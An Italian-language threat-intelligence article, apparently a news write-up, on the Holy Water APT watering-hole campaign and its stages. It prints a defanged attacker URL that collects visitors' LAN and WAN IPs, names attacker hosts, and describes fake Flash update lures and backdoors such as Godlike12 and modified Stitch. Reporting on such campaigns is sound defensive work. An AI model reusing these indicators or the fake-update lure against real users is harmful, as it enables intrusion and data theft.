Holy Water APT

Holy Water APT è il nome dato a un gruppo di criminali informatici che ha condotto una serie di attacchi di tipo water-hole contro un gruppo religioso ed etnico asiatico. Il TTP (Tactics, Techniques and Procedures) di questo particolare attacco non può essere attribuito a nessuno dei già noti attori ATP (Advanced Persistent Threat), il che ha portato i ricercatori a concludere che si tratta di un nuovo gruppo di criminali informatici che mostra caratteristiche di un piccolo e flessibile team di hacker.

Per condurre un attacco a pozza d'acqua, i criminali prendono di mira diversi siti Web visitati frequentemente dagli obiettivi designati. I siti possono appartenere a organizzazioni, enti di beneficenza o individui influenti che appartengono al gruppo target. Tutti i siti Web compromessi da Holy Water erano ospitati sullo stesso server e includevano, tra gli altri, una personalità religiosa, un programma di beneficenza, un servizio di volontariato e un'organizzazione di commercio equo.

L'attacco includeva più fasi

Dopo aver visitato un sito Web compromesso, l'utente entra nella prima fase di attacco che consiste in un JavaScript corrotto denominato (script|jquery)-css.js e offuscato con Sojson, un servizio Web con sede in Cina. Il ruolo di questo script è determinare se l'utente è un target valido e per farlo il payload inizia a raccogliere i dati sul visitatore e inviarli a un server esterno su loginwebmailnic.dynssl[.]com tramite richieste HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

La risposta del server restituisce un risultato vero o falso e, se il valore è vero, viene attivata la fase successiva dell'attacco; altrimenti non succede nulla.

Durante il secondo passaggio, un JavaScript chiamato (script|jquery)-file.js, che è, ancora una volta, offuscato allo stesso modo. Tuttavia, questa volta gli hacker hanno utilizzato Sojson v5 invece di v4. Per infettare l'utente, Holy Water APT non sfrutta alcuna vulnerabilità o debolezza del software. Viene invece generata una finestra pop-up che offre un aggiornamento di Flash Player e la potenziale vittima deve accettare di scaricare il file.

L'arsenale di strumenti malware di Holy Water APT è stato ospitato su GitHub

Se l'utente consente al falso aggiornamento Flash di procedere, si connette a un repository GitHub non più attivo situato su github.com/AdobeFlash32/FlashUpdate . In quella posizione sono stati archiviati quattro diversi set di strumenti: un pacchetto di installazione, un malware backdoor denominato dai ricercatori Godlike12 e due versioni di una backdoor Python open source nota come Stitch, che sono state modificate dagli hacker con funzionalità ampliate. Il pacchetto di aggiornamento è un programma di installazione NSIS che rilascia un programma di installazione legittimo di Windows Flash Player e uno strumento stager utilizzato per caricare il payload effettivo. La backdoor Godlike12 è scritta in linguaggio Go e viene utilizzata per implementare un canale Google Drive per i server Command and Control (C&C, C2). Per quanto riguarda le varianti backdoor di Stitch, oltre alle consuete attività backdoor come raccolta di informazioni e password, registrazione attività, download di file, ecc., il gruppo Holy Water ha aggiunto la possibilità di scaricare un legittimo programma di installazione di Adobe Flash, per l'aggiornamento automatico stesso da ubntrooters.serveuser.com e ottenere la persistenza sfruttando le attività pianificate.